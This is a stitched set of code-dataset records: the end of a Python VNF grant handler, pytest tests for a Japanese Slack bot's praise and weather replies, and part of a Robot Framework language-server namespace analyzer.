{
"id": tmp["vim"]["vimId"],
"vimId": tmp["vim"]["vimId"],
"vimType": None,
"interfaceInfo": None,
"accessInfo": tmp["vim"]["accessInfo"],
"extra": None
}
)
grant_resp = {
"id": str(uuid.uuid4()),
"vnfInstanceId": ignore_case_get(self.data, 'vnfInstanceId'),
"vnfLcmOpOccId": ignore_case_get(self.data, "vnfLcmOpOccId"),
"vimConnections": vimConnections
}
logger.debug("action_type=%s" % action_type)
if action_type == 'INSTANTIATE':
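# poll for OOF placement data: up to 18 attempts, 5 s apart (~90 s total)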
for i in range(18):
offs = OOFDataModel.objects.filter(service_resource_id=ignore_case_get(self.data, "vnfInstanceId"))
if not (offs.exists() and offs[0].vdu_info):
logger.debug("Cannot find oof data, retry%s" % (i + 1))
time.sleep(5)
continue
try:
vdu_info = json.loads(offs[0].vdu_info)
grant_resp['vimAssets'] = {'computeResourceFlavours': []}
for vdu in vdu_info:
grant_resp['vimAssets']['computeResourceFlavours'].append({
'vimConnectionId': offs[0].vim_id,
'resourceProviderId': vdu.get("vduName"),
'vnfdVirtualComputeDescId': None, # TODO: required
'vimFlavourId': vdu.get("flavorId")
})
# grant_resp['additionalparams'][off.vim_id] = off.directive
except Exception:
logger.debug("Load OOF data error")
break
logger.debug("grant_resp=%s", grant_resp)
return grant_resp
def get_res_tpl(self, vdu, vnfd):
storage_size = 0
for storage_id in vdu["local_storages"]:
storage_size = storage_size + self.get_storage_size(storage_id, vnfd)
resourceTemplate = {
"virtualComputeDescriptor": {
"virtualCpu": {
"numVirtualCpu": int(vdu["virtual_compute"]["virtual_cpu"]["num_virtual_cpu"])
},
"virtualMemory": {
"virtualMemSize": parse_unit(vdu["virtual_compute"]["virtual_memory"]["virtual_mem_size"], "MB")
}
},
"virtualStorageDescriptor": {
"typeOfStorage": "",
"sizeOfStorage": storage_size,
"swImageDescriptor": ""
}
}
return resourceTemplate
def get_storage_size(self, storage_id, vnfd):
for storage in vnfd["local_storages"]:
if storage_id == storage["local_storage_id"]:
return parse_unit(storage["properties"]["size"], "GB")
return 0
def parse_unit(val, base_unit):
# recognized_units = ["B", "kB", "KiB", "MB", "MiB", "GB", "GiB", "TB", "TiB"]
# units_rate = [1, 1000, 1024, 1000000, 1048576, 1000000000, 1073741824, 1000000000000, 1099511627776]
# unit_rate_map = {unit.upper(): rate for unit, rate in zip(recognized_units, units_rate)}
num_unit = val.strip().split(" ")
if len(num_unit) != 2:
return val.strip()
num, unit = num_unit[0], num_unit[1]
return int(num) * SCALAR_UNIT_DICT[unit.upper()] / SCALAR_UNIT_DICT[base_unit.upper()]
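# Example (sketch, assuming SCALAR_UNIT_DICT maps e.g. "MB" -> 10**6 and "GB" -> 10**9):
# parse_unit("4 GB", "MB") -> 4000.0; a bare value such as "512" is returned
# stripped but unconverted.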
| 41.754286 | 116 | 0.575065 | 800 | 7,307 | 5.015 | 0.315 | 0.035892 | 0.055085 | 0.04661 | 0.166002 | 0.140578 | 0.09322 | 0.044367 | 0.044367 | 0.018943 | 0 | 0.01828 | 0.318735 | 7,307 | 174 | 117 | 41.994253 | 0.787666 | 0.122896 | 0 | 0.092199 | 0 | 0 | 0.160876 | 0.018466 | 0 | 0 | 0 | 0.005747 | 0 | 1 | 0.035461 | false | 0 | 0.070922 | 0 | 0.156028 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9c86fc3cc7d33b4cf70c509d1568b79a22d1d208 | 5,877 | py | Python | tests/test_oyashiki.py | maidnomad/maidchan-slackbot | 42364c2ffef60211a1d5be53f7d3ff1922418abd | [
"MIT"
] | null | null | null | tests/test_oyashiki.py | maidnomad/maidchan-slackbot | 42364c2ffef60211a1d5be53f7d3ff1922418abd | [
"MIT"
] | null | null | null | tests/test_oyashiki.py | maidnomad/maidchan-slackbot | 42364c2ffef60211a1d5be53f7d3ff1922418abd | [
"MIT"
] | null | null | null | from unittest import mock
import freezegun
import pytest
@pytest.fixture
def target():
from maidchan.tasks import お屋敷のお仕事をする
return お屋敷のお仕事をする
@pytest.mark.parametrize(
"text, expected",
[
("メイドちゃん!褒めて!", "<@00000000>さん!すごーい!"),
("メイドちゃん!私を褒めて!", "<@00000000>さん!すごーい!"),
("メイドちゃん!頑張った僕を褒めて!", "<@00000000>さん、頑張ったんだ!すごーい!"),
("メイドちゃん!テストで一位の僕を褒めて!", "<@00000000>さん、テストで一位なんだ!すごーい!"),
("メイドちゃん!早起きした<@00000001>を褒めて!", "<@00000001>さん、早起きしたんだ!すごーい!"),
("あはははあhvうぇjprgsdv", None), # 無関係なメッセージ
],
)
def test_text_response(target, text, expected):
"""テキストに対するレスポンスが仕様通りであること"""
actual = target({"user_id": "00000000", "text": text})
assert actual == expected
@pytest.mark.parametrize(
"text, expected",
[
("メイドちゃん!今日の天気を教えて!", "今日の東京都秋葉原地方の天気は *晴れ* 、最高気温は 30度 です!"),
("メイドちゃん!明日の天気を教えて!", "明日の東京都秋葉原地方の天気は *曇り* 、最高気温は 20度 です!"),
("メイドちゃん!明後日の天気を教えて!", "明後日の東京都秋葉原地方の天気は *雨* 、最高気温は 10度 です! *傘を忘れないで!!* "),
],
)
def test_weather_by_date_label(target, text, expected):
"""天気予報機能で今日、明日、明後日の指定が正しくできること"""
with mock.patch("maidchan.tasks.天気予報._call_weather_api") as mock_call_weather_api:
mock_call_weather_api.return_value = {
"forecasts": {
0: {
"dateLabel": "今日",
"telop": "晴れ",
"temperature": {"max": {"celsius": "30"}},
},
1: {
"dateLabel": "明日",
"telop": "曇り",
"temperature": {"max": {"celsius": "20"}},
},
2: {
"dateLabel": "明後日",
"telop": "雨",
"temperature": {"max": {"celsius": "10"}},
},
},
"location": {"prefecture": "東京都", "district": "秋葉原地方"},
}
actual = target({"user_id": "00000000", "text": text})
assert actual == expected
@pytest.mark.parametrize(
"prefecture, district, expected",
[
("東京都", "東京地方", "今日の東京地方の天気は *晴れ* 、最高気温は 30度 です!"),
("大阪府", "大阪府", "今日の大阪府の天気は *晴れ* 、最高気温は 30度 です!"),
("広島県", "南部", "今日の広島県南部の天気は *晴れ* 、最高気温は 30度 です!"),
],
)
def test_weather_fix_location_name(target, prefecture, district, expected):
"""天気予報機能で東京都東京地方、大阪府大阪府など微妙な地域名を補正すること"""
with mock.patch("maidchan.tasks.天気予報._call_weather_api") as mock_call_weather_api:
mock_call_weather_api.return_value = {
"forecasts": {
0: {
"dateLabel": "今日",
"telop": "晴れ",
"temperature": {"max": {"celsius": "30"}},
},
},
"location": {"prefecture": prefecture, "district": district},
}
actual = target({"user_id": "00000000", "text": "メイドちゃん!今日の大阪の天気を教えて!"})
assert actual == expected
@pytest.mark.parametrize(
"time, expected",
[
("08:00:00+09:00", "今日の東京都秋葉原地方の天気は *晴れ* 、最高気温は 30度 です!"),
("17:59:59+09:00", "今日の東京都秋葉原地方の天気は *晴れ* 、最高気温は 30度 です!"),
("18:00:00+09:00", "明日の東京都秋葉原地方の天気は *曇り* 、最高気温は 20度 です!"),
("20:00:00+09:00", "明日の東京都秋葉原地方の天気は *曇り* 、最高気温は 20度 です!"),
],
)
def test_weather_by_current_time(target, time, expected):
"""天気予報機能で現在時刻に応じて、今日か明日のとりわけが正しくできること"""
with freezegun.freeze_time("2021-07-18 " + time) as _, mock.patch(
"maidchan.tasks.天気予報._call_weather_api"
) as mock_call_weather_api:
mock_call_weather_api.return_value = {
"forecasts": {
0: {
"dateLabel": "今日",
"telop": "晴れ",
"temperature": {"max": {"celsius": "30"}},
},
1: {
"dateLabel": "明日",
"telop": "曇り",
"temperature": {"max": {"celsius": "20"}},
},
},
"location": {"prefecture": "東京都", "district": "秋葉原地方"},
}
actual = target({"user_id": "00000000", "text": "メイドちゃん!天気を教えて!"})
assert actual == expected
def test_weather_responded_error(target):
"""天気予報機能でAPIエラーの時の挙動が仕様通りであること"""
with mock.patch("maidchan.tasks.天気予報._call_weather_api") as mock_call_weather_api:
mock_call_weather_api.side_effect = Exception
actual = target({"user_id": "00000000", "text": "メイドちゃん!天気を教えて!"})
assert actual == "今日の天気は分かりません(;_;)"
def test_weather_by_unknown_response(target):
"""天気予報機能でAPIのレスポンスが想定外の形式の時のメッセージが仕様通りであること"""
with mock.patch("maidchan.tasks.天気予報._call_weather_api") as mock_call_weather_api:
mock_call_weather_api.return_value = {
"forecasts": {
0: {
"dateLabel": "今日",
}
},
"location": {"prefecture": "東京都", "district": "秋葉原地方"},
}
actual = target({"user_id": "00000000", "text": "メイドちゃん!今日の天気を教えて!"})
assert actual == "今日の東京都秋葉原地方の天気は *わかりません* 、最高気温は わかりません です!"
@pytest.mark.parametrize(
"text, city_id",
[
("メイドちゃん!今日の大阪の天気を教えて!", "270000"),
("メイドちゃん!今日の仙台の天気を教えて!", "040010"),
("メイドちゃん!今日の天気を教えて!", "130010"),
],
)
def test_weather_by_city(target, text, city_id):
"""天気予報機能で都市の指定が正しくできること"""
with mock.patch("maidchan.tasks.天気予報._call_weather_api") as mock_call_weather_api:
mock_call_weather_api.return_value = {
"forecasts": {
0: {
"dateLabel": "今日",
"telop": "晴れ",
"temperature": {"max": {"celsius": "30"}},
},
},
"location": {"prefecture": "東京都", "district": "秋葉原地方"},
}
target({"user_id": "00000000", "text": text})
mock_call_weather_api.assert_called_with(city_id)
| 34.570588 | 86 | 0.532244 | 547 | 5,877 | 5.531993 | 0.241316 | 0.069068 | 0.087905 | 0.07733 | 0.544613 | 0.521481 | 0.479841 | 0.447455 | 0.447455 | 0.424323 | 0 | 0.051519 | 0.299813 | 5,877 | 169 | 87 | 34.775148 | 0.68384 | 0.038965 | 0 | 0.451389 | 0 | 0 | 0.330898 | 0.059159 | 0 | 0 | 0 | 0 | 0.048611 | 1 | 0.055556 | false | 0 | 0.027778 | 0 | 0.090278 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9c88328d2f2e6bbd1db0fc76c3be87f48859e1ad | 65,821 | py | Python | robotcode/language_server/robotframework/diagnostics/namespace.py | mardukbp/robotcode | 0b34cf6e7931423117036fcf70f74e27da0cfb0f | [
"Apache-2.0"
] | null | null | null | robotcode/language_server/robotframework/diagnostics/namespace.py | mardukbp/robotcode | 0b34cf6e7931423117036fcf70f74e27da0cfb0f | [
"Apache-2.0"
] | null | null | null | robotcode/language_server/robotframework/diagnostics/namespace.py | mardukbp/robotcode | 0b34cf6e7931423117036fcf70f74e27da0cfb0f | [
"Apache-2.0"
] | null | null | null | from __future__ import annotations
import ast
import asyncio
import itertools
import weakref
from collections import OrderedDict
from dataclasses import dataclass, field
from enum import Enum
from pathlib import Path
from typing import (
Any,
AsyncIterator,
Callable,
Dict,
Iterable,
List,
NamedTuple,
Optional,
Sequence,
Tuple,
cast,
)
from ....utils.async_itertools import async_chain
from ....utils.logging import LoggingDescriptor
from ....utils.uri import Uri
from ...common.lsp_types import (
Diagnostic,
DiagnosticRelatedInformation,
DiagnosticSeverity,
DiagnosticTag,
Location,
Position,
Range,
)
from ...common.text_document import TextDocument
from ..utils.ast import (
Token,
is_non_variable_token,
range_from_node,
range_from_token_or_node,
tokenize_variables,
)
from ..utils.async_ast import AsyncVisitor
from .imports_manager import ImportsManager
from .library_doc import (
BUILTIN_LIBRARY_NAME,
BUILTIN_VARIABLES,
DEFAULT_LIBRARIES,
KeywordDoc,
KeywordMatcher,
LibraryDoc,
VariableMatcher,
is_embedded_keyword,
)
DIAGNOSTICS_SOURCE_NAME = "robotcode.namespace"
class DiagnosticsError(Exception):
pass
class DiagnosticsWarningError(DiagnosticsError):
pass
class ImportError(DiagnosticsError):
pass
@dataclass
class SourceEntity:
line_no: int
col_offset: int
end_line_no: int
end_col_offset: int
source: str
@dataclass
class Import(SourceEntity):
name: Optional[str]
name_token: Optional[Token]
def range(self) -> Range:
return Range(
start=Position(
line=self.name_token.lineno - 1 if self.name_token is not None else self.line_no - 1,
character=self.name_token.col_offset if self.name_token is not None else self.col_offset,
),
end=Position(
line=self.name_token.lineno - 1 if self.name_token is not None else self.end_line_no - 1,
character=self.name_token.end_col_offset if self.name_token is not None else self.end_col_offset,
),
)
@dataclass
class LibraryImport(Import):
args: Tuple[str, ...] = ()
alias: Optional[str] = None
def __hash__(self) -> int:
return hash(
(
type(self),
self.name,
self.args,
self.alias,
)
)
@dataclass
class ResourceImport(Import):
def __hash__(self) -> int:
return hash(
(
type(self),
self.name,
)
)
@dataclass
class VariablesImport(Import):
args: Tuple[str, ...] = ()
def __hash__(self) -> int:
return hash(
(
type(self),
self.name,
self.args,
)
)
class VariableDefinitionType(Enum):
VARIABLE = "variable"
ARGUMENT = "argument"
COMMAND_LINE_VARIABLE = "command line variable"
BUILTIN_VARIABLE = "builtin variable"
@dataclass
class VariableDefinition(SourceEntity):
name: Optional[str]
name_token: Optional[Token]
type: VariableDefinitionType = VariableDefinitionType.VARIABLE
def __hash__(self) -> int:
return hash((type(self), self.name, self.type))
def range(self) -> Range:
return Range(
start=Position(
line=self.line_no - 1,
character=self.col_offset,
),
end=Position(
line=self.end_line_no - 1,
character=self.end_col_offset,
),
)
@dataclass
class BuiltInVariableDefinition(VariableDefinition):
type: VariableDefinitionType = VariableDefinitionType.BUILTIN_VARIABLE
def __hash__(self) -> int:
return hash((type(self), self.name, self.type))
@dataclass
class CommandLineVariableDefinition(VariableDefinition):
type: VariableDefinitionType = VariableDefinitionType.COMMAND_LINE_VARIABLE
def __hash__(self) -> int:
return hash((type(self), self.name, self.type))
@dataclass
class ArgumentDefinition(VariableDefinition):
type: VariableDefinitionType = VariableDefinitionType.ARGUMENT
def __hash__(self) -> int:
return hash((type(self), self.name, self.type))
class NameSpaceError(Exception):
pass
class VariablesVisitor(AsyncVisitor):
async def get(self, source: str, model: ast.AST) -> List[VariableDefinition]:
self._results: List[VariableDefinition] = []
self.source = source
await self.visit(model)
return self._results
async def visit_Section(self, node: ast.AST) -> None: # noqa: N802
from robot.parsing.model.blocks import VariableSection
if isinstance(node, VariableSection):
await self.generic_visit(node)
async def visit_Variable(self, node: ast.AST) -> None: # noqa: N802
from robot.parsing.lexer.tokens import Token
from robot.parsing.model.statements import Variable
n = cast(Variable, node)
name = n.get_token(Token.VARIABLE)
if n.name:
self._results.append(
VariableDefinition(
name=n.name,
name_token=name if name is not None else None,
line_no=node.lineno,
col_offset=node.col_offset,
end_line_no=node.end_lineno if node.end_lineno is not None else -1,
end_col_offset=node.end_col_offset if node.end_col_offset is not None else -1,
source=self.source,
)
)
class BlockVariableVisitor(AsyncVisitor):
async def get(self, source: str, model: ast.AST, position: Optional[Position] = None) -> List[VariableDefinition]:
self.source = source
self.position = position
self._results: List[VariableDefinition] = []
await self.visit(model)
return self._results
async def visit(self, node: ast.AST) -> None:
if self.position is None or self.position >= range_from_node(node).start:
return await super().visit(node)
async def visit_KeywordName(self, node: ast.AST) -> None: # noqa: N802
from robot.parsing.lexer.tokens import Token as RobotToken
from robot.parsing.model.statements import KeywordName
from robot.variables.search import VariableSearcher
n = cast(KeywordName, node)
name_token = cast(Token, n.get_token(RobotToken.KEYWORD_NAME))
if name_token is not None and name_token.value:
for a in filter(
lambda e: e.type == RobotToken.VARIABLE,
tokenize_variables(name_token, identifiers="$", ignore_errors=True),
):
if a.value:
searcher = VariableSearcher("$", ignore_errors=True)
match = searcher.search(a.value)
if match.base is None:
continue
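# keep only the variable name, dropping any embedded-argument pattern
# ("${arg:\d+}" becomes "${arg}")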
name = f"{match.identifier}{{{match.base.split(':', 1)[0]}}}"
self._results.append(
ArgumentDefinition(
name=name,
name_token=a,
line_no=a.lineno,
col_offset=node.col_offset,
end_line_no=node.end_lineno
if node.end_lineno is not None
else a.lineno
if a.lineno is not None
else -1,
end_col_offset=node.end_col_offset
if node.end_col_offset is not None
else a.end_col_offset
if a.end_col_offset is not None
else -1,
source=self.source,
)
)
async def visit_Arguments(self, node: ast.AST) -> None: # noqa: N802
from robot.errors import VariableError
from robot.parsing.lexer.tokens import Token as RobotToken
from robot.parsing.model.statements import Arguments
n = cast(Arguments, node)
arguments = n.get_tokens(RobotToken.ARGUMENT)
for argument1 in (cast(RobotToken, e) for e in arguments):
try:
argument = None
try:
argument = next(
(
v
for v in itertools.dropwhile(
lambda t: t.type in RobotToken.NON_DATA_TOKENS, argument1.tokenize_variables()
)
if v.type == RobotToken.VARIABLE
),
None,
)
except VariableError:
pass
if argument is not None:
self._results.append(
ArgumentDefinition(
name=argument.value,
name_token=argument,
line_no=node.lineno,
col_offset=node.col_offset,
end_line_no=node.end_lineno
if node.end_lineno is not None
else argument.lineno
if argument.lineno is not None
else -1,
end_col_offset=node.end_col_offset
if node.end_col_offset is not None
else argument.end_col_offset
if argument.end_col_offset is not None
else -1,
source=self.source,
)
)
except VariableError:
pass
async def visit_KeywordCall(self, node: ast.AST) -> None: # noqa: N802
from robot.errors import VariableError
from robot.parsing.lexer.tokens import Token as RobotToken
from robot.parsing.model.statements import KeywordCall
from robot.variables.search import contains_variable
try:
n = cast(KeywordCall, node)
assign_token = n.get_token(RobotToken.ASSIGN)
if assign_token is not None and assign_token.value and contains_variable(assign_token.value):
self._results.append(
VariableDefinition(
name=assign_token.value,
name_token=assign_token,
line_no=node.lineno,
col_offset=node.col_offset,
end_line_no=node.end_lineno
if node.end_lineno is not None
else assign_token.lineno
if assign_token.lineno is not None
else -1,
end_col_offset=node.end_col_offset
if node.end_col_offset is not None
else assign_token.end_col_offset
if assign_token.end_col_offset is not None
else -1,
source=self.source,
)
)
except VariableError:
pass
async def visit_ForHeader(self, node: ast.AST) -> None: # noqa: N802
from robot.errors import VariableError
from robot.parsing.lexer.tokens import Token as RobotToken
from robot.parsing.model.statements import ForHeader
from robot.variables.search import contains_variable
try:
n = cast(ForHeader, node)
variables = n.get_tokens(RobotToken.VARIABLE)
for variable in variables:
if variable is not None and variable.value and contains_variable(variable.value):
self._results.append(
VariableDefinition(
name=variable.value,
name_token=variable,
line_no=node.lineno,
col_offset=node.col_offset,
end_line_no=node.end_lineno
if node.end_lineno is not None
else variable.lineno
if variable.lineno is not None
else -1,
end_col_offset=node.end_col_offset
if node.end_col_offset is not None
else variable.end_col_offset
if variable.end_col_offset is not None
else -1,
source=self.source,
)
)
except VariableError:
pass
class ImportVisitor(AsyncVisitor):
async def get(self, source: str, model: ast.AST) -> List[Import]:
self._results: List[Import] = []
self.source = source
await self.visit(model)
return self._results
async def visit_Section(self, node: ast.AST) -> None: # noqa: N802
from robot.parsing.model.blocks import SettingSection
if isinstance(node, SettingSection):
await self.generic_visit(node)
async def visit_LibraryImport(self, node: ast.AST) -> None: # noqa: N802
from robot.parsing.lexer.tokens import Token as RobotToken
from robot.parsing.model.statements import LibraryImport as RobotLibraryImport
n = cast(RobotLibraryImport, node)
name = cast(RobotToken, n.get_token(RobotToken.NAME))
self._results.append(
LibraryImport(
name=n.name,
name_token=name if name is not None else None,
args=n.args,
alias=n.alias,
line_no=node.lineno,
col_offset=node.col_offset,
end_line_no=node.end_lineno if node.end_lineno is not None else -1,
end_col_offset=node.end_col_offset if node.end_col_offset is not None else -1,
source=self.source,
)
)
async def visit_ResourceImport(self, node: ast.AST) -> None: # noqa: N802
from robot.parsing.lexer.tokens import Token as RobotToken
from robot.parsing.model.statements import ResourceImport as RobotResourceImport
n = cast(RobotResourceImport, node)
name = cast(RobotToken, n.get_token(RobotToken.NAME))
self._results.append(
ResourceImport(
name=n.name,
name_token=name if name is not None else None,
line_no=node.lineno,
col_offset=node.col_offset,
end_line_no=node.end_lineno if node.end_lineno is not None else -1,
end_col_offset=node.end_col_offset if node.end_col_offset is not None else -1,
source=self.source,
)
)
async def visit_VariablesImport(self, node: ast.AST) -> None: # noqa: N802
from robot.parsing.lexer.tokens import Token as RobotToken
from robot.parsing.model.statements import (
VariablesImport as RobotVariablesImport,
)
n = cast(RobotVariablesImport, node)
name = cast(RobotToken, n.get_token(RobotToken.NAME))
self._results.append(
VariablesImport(
name=n.name,
name_token=name if name is not None else None,
args=n.args,
line_no=node.lineno,
col_offset=node.col_offset,
end_line_no=node.end_lineno if node.end_lineno is not None else -1,
end_col_offset=node.end_col_offset if node.end_col_offset is not None else -1,
source=self.source,
)
)
class Analyzer(AsyncVisitor):
async def get(self, model: ast.AST, namespace: Namespace) -> List[Diagnostic]:
self._results: List[Diagnostic] = []
self._namespace = namespace
self.current_testcase_or_keyword_name: Optional[str] = None
await self.visit(model)
return self._results
async def _analyze_keyword_call(
self,
keyword: Optional[str],
value: ast.AST,
keyword_token: Token,
argument_tokens: List[Token],
analyse_run_keywords: bool = True,
) -> Optional[KeywordDoc]:
result: Optional[KeywordDoc] = None
try:
finder = KeywordFinder(self._namespace)
result = await finder.find_keyword(keyword)
for e in finder.diagnostics:
self._results.append(
Diagnostic(
range=range_from_token_or_node(value, keyword_token),
message=e.message,
severity=e.severity,
source=DIAGNOSTICS_SOURCE_NAME,
code=e.code,
)
)
if result is not None:
if result.errors:
self._results.append(
Diagnostic(
range=range_from_token_or_node(value, keyword_token),
message="Keyword definition contains errors.",
severity=DiagnosticSeverity.ERROR,
source=DIAGNOSTICS_SOURCE_NAME,
related_information=[
DiagnosticRelatedInformation(
location=Location(
uri=str(
Uri.from_path(
err.source
if err.source is not None
else result.source
if result.source is not None
else "/<unknown>"
)
),
range=Range(
start=Position(
line=err.line_no - 1
if err.line_no is not None
else result.line_no
if result.line_no >= 0
else 0,
character=0,
),
end=Position(
line=err.line_no - 1
if err.line_no is not None
else result.line_no
if result.line_no >= 0
else 0,
character=0,
),
),
),
message=err.message,
)
for err in result.errors
],
)
)
if result.is_deprecated:
self._results.append(
Diagnostic(
range=range_from_token_or_node(value, keyword_token),
message=f"Keyword '{result.name}' is deprecated"
f"{f': {result.deprecated_message}' if result.deprecated_message else ''}.",
severity=DiagnosticSeverity.HINT,
source=DIAGNOSTICS_SOURCE_NAME,
tags=[DiagnosticTag.Deprecated],
)
)
if result.is_error_handler:
self._results.append(
Diagnostic(
range=range_from_token_or_node(value, keyword_token),
message=f"Keyword definition contains errors: {result.error_handler_message}",
severity=DiagnosticSeverity.ERROR,
source=DIAGNOSTICS_SOURCE_NAME,
)
)
except (asyncio.CancelledError, SystemExit, KeyboardInterrupt):
raise
except BaseException as e:
self._results.append(
Diagnostic(
range=range_from_token_or_node(value, keyword_token),
message=str(e),
severity=DiagnosticSeverity.ERROR,
source=DIAGNOSTICS_SOURCE_NAME,
code=type(e).__qualname__,
)
)
if result is not None and analyse_run_keywords:
await self._analyse_run_keyword(result, value, argument_tokens)
return result
async def _analyse_run_keyword(
self, keyword_doc: Optional[KeywordDoc], node: ast.AST, argument_tokens: List[Token]
) -> List[Token]:
if keyword_doc is None or not keyword_doc.is_any_run_keyword():
return argument_tokens
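# "run keyword" variants receive the real keyword as an argument;
# analyze that nested call as well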
if keyword_doc.is_run_keyword() and len(argument_tokens) > 0 and is_non_variable_token(argument_tokens[0]):
await self._analyze_keyword_call(argument_tokens[0].value, node, argument_tokens[0], argument_tokens[1:])
return argument_tokens[1:]
elif (
keyword_doc.is_run_keyword_with_condition()
and len(argument_tokens) > 1
and is_non_variable_token(argument_tokens[1])
):
await self._analyze_keyword_call(argument_tokens[1].value, node, argument_tokens[1], argument_tokens[2:])
return argument_tokens[2:]
elif keyword_doc.is_run_keywords():
for t in argument_tokens:
if is_non_variable_token(t):
await self._analyze_keyword_call(t.value, node, t, [])
return []
elif keyword_doc.is_run_keyword_if() and len(argument_tokens) > 1 and is_non_variable_token(argument_tokens[1]):
def skip_args() -> None:
nonlocal argument_tokens
while argument_tokens:
if argument_tokens[0].value in ["ELSE", "ELSE IF"]:
break
argument_tokens = argument_tokens[1:]
result = await self._analyze_keyword_call(
argument_tokens[1].value,
node,
argument_tokens[1],
argument_tokens[2:],
analyse_run_keywords=False,
)
argument_tokens = argument_tokens[2:]
if result is not None and result.is_any_run_keyword():
argument_tokens = await self._analyse_run_keyword(result, node, argument_tokens)
skip_args()
while argument_tokens:
if argument_tokens[0].value == "ELSE" and len(argument_tokens) > 1:
result = await self._analyze_keyword_call(
argument_tokens[1].value,
node,
argument_tokens[1],
argument_tokens[2:],
analyse_run_keywords=False,
)
argument_tokens = argument_tokens[2:]
if result is not None and result.is_any_run_keyword():
argument_tokens = await self._analyse_run_keyword(result, node, argument_tokens)
skip_args()
break
elif argument_tokens[0].value == "ELSE IF" and len(argument_tokens) > 2:
result = await self._analyze_keyword_call(
argument_tokens[2].value,
node,
argument_tokens[2],
argument_tokens[3:],
analyse_run_keywords=False,
)
argument_tokens = argument_tokens[3:]
if result is not None and result.is_any_run_keyword():
argument_tokens = await self._analyse_run_keyword(result, node, argument_tokens)
skip_args()
else:
break
return argument_tokens
async def visit_Fixture(self, node: ast.AST) -> None: # noqa: N802
from robot.parsing.lexer.tokens import Token as RobotToken
from robot.parsing.model.statements import Fixture
value = cast(Fixture, node)
keyword_token = cast(Token, value.get_token(RobotToken.NAME))
# TODO: calculate possible variables in NAME
if keyword_token is not None and is_non_variable_token(keyword_token):
await self._analyze_keyword_call(
value.name, value, keyword_token, [cast(Token, e) for e in value.get_tokens(RobotToken.ARGUMENT)]
)
await self.generic_visit(node)
async def visit_TestTemplate(self, node: ast.AST) -> None: # noqa: N802
from robot.parsing.lexer.tokens import Token as RobotToken
from robot.parsing.model.statements import TestTemplate
value = cast(TestTemplate, node)
keyword_token = cast(Token, value.get_token(RobotToken.NAME))
# TODO: calculate possible variables in NAME
if keyword_token is not None and is_non_variable_token(keyword_token):
await self._analyze_keyword_call(value.value, value, keyword_token, [])
await self.generic_visit(node)
async def visit_Template(self, node: ast.AST) -> None: # noqa: N802
from robot.parsing.lexer.tokens import Token as RobotToken
from robot.parsing.model.statements import Template
value = cast(Template, node)
keyword_token = cast(Token, value.get_token(RobotToken.NAME))
# TODO: calculate possible variables in NAME
if keyword_token is not None and is_non_variable_token(keyword_token):
await self._analyze_keyword_call(value.value, value, keyword_token, [])
await self.generic_visit(node)
async def visit_KeywordCall(self, node: ast.AST) -> None: # noqa: N802
from robot.parsing.lexer.tokens import Token as RobotToken
from robot.parsing.model.statements import KeywordCall
value = cast(KeywordCall, node)
keyword_token = cast(RobotToken, value.get_token(RobotToken.KEYWORD))
if value.assign and not value.keyword:
self._results.append(
Diagnostic(
range=range_from_token_or_node(value, value.get_token(RobotToken.ASSIGN)),
message="Keyword name cannot be empty.",
severity=DiagnosticSeverity.ERROR,
source=DIAGNOSTICS_SOURCE_NAME,
code="KeywordError",
)
)
else:
await self._analyze_keyword_call(
value.keyword, value, keyword_token, [cast(Token, e) for e in value.get_tokens(RobotToken.ARGUMENT)]
)
if not self.current_testcase_or_keyword_name:
self._results.append(
Diagnostic(
range=range_from_token_or_node(value, value.get_token(RobotToken.ASSIGN)),
message="Code is unreachable.",
severity=DiagnosticSeverity.HINT,
source=DIAGNOSTICS_SOURCE_NAME,
tags=[DiagnosticTag.Unnecessary],
)
)
await self.generic_visit(node)
async def visit_TestCase(self, node: ast.AST) -> None: # noqa: N802
from robot.parsing.lexer.tokens import Token as RobotToken
from robot.parsing.model.blocks import TestCase
from robot.parsing.model.statements import TestCaseName
testcase = cast(TestCase, node)
if not testcase.name:
name_token = cast(TestCaseName, testcase.header).get_token(RobotToken.TESTCASE_NAME)
self._results.append(
Diagnostic(
range=range_from_token_or_node(testcase, name_token),
message="Test case name cannot be empty.",
severity=DiagnosticSeverity.ERROR,
source=DIAGNOSTICS_SOURCE_NAME,
code="KeywordError",
)
)
self.current_testcase_or_keyword_name = testcase.name
try:
await self.generic_visit(node)
finally:
self.current_testcase_or_keyword_name = None
async def visit_Keyword(self, node: ast.AST) -> None: # noqa: N802
from robot.parsing.lexer.tokens import Token as RobotToken
from robot.parsing.model.blocks import Keyword
from robot.parsing.model.statements import Arguments, KeywordName
keyword = cast(Keyword, node)
if keyword.name:
name_token = cast(KeywordName, keyword.header).get_token(RobotToken.KEYWORD_NAME)
if is_embedded_keyword(keyword.name) and any(
isinstance(v, Arguments) and len(v.values) > 0 for v in keyword.body
):
self._results.append(
Diagnostic(
range=range_from_token_or_node(keyword, name_token),
message="Keyword cannot have both normal and embedded arguments.",
severity=DiagnosticSeverity.ERROR,
source=DIAGNOSTICS_SOURCE_NAME,
code="KeywordError",
)
)
else:
name_token = cast(KeywordName, keyword.header).get_token(RobotToken.KEYWORD_NAME)
self._results.append(
Diagnostic(
range=range_from_token_or_node(keyword, name_token),
message="Keyword name cannot be empty.",
severity=DiagnosticSeverity.ERROR,
source=DIAGNOSTICS_SOURCE_NAME,
code="KeywordError",
)
)
self.current_testcase_or_keyword_name = keyword.name
try:
await self.generic_visit(node)
finally:
self.current_testcase_or_keyword_name = None
@dataclass
class LibraryEntry:
name: str
import_name: str
library_doc: LibraryDoc
args: Tuple[Any, ...] = ()
alias: Optional[str] = None
import_range: Range = field(default_factory=lambda: Range.zero())
import_source: str = ""
def __str__(self) -> str:
result = self.import_name
if self.args:
result += f" {str(self.args)}"
if self.alias:
result += f" WITH NAME {self.alias}"
return result
@dataclass
class ResourceEntry(LibraryEntry):
imports: List[Import] = field(default_factory=lambda: [])
variables: List[VariableDefinition] = field(default_factory=lambda: [])
@dataclass
class VariablesEntry(LibraryEntry):
pass
class Namespace:
_logger = LoggingDescriptor()
@_logger.call
def __init__(
self,
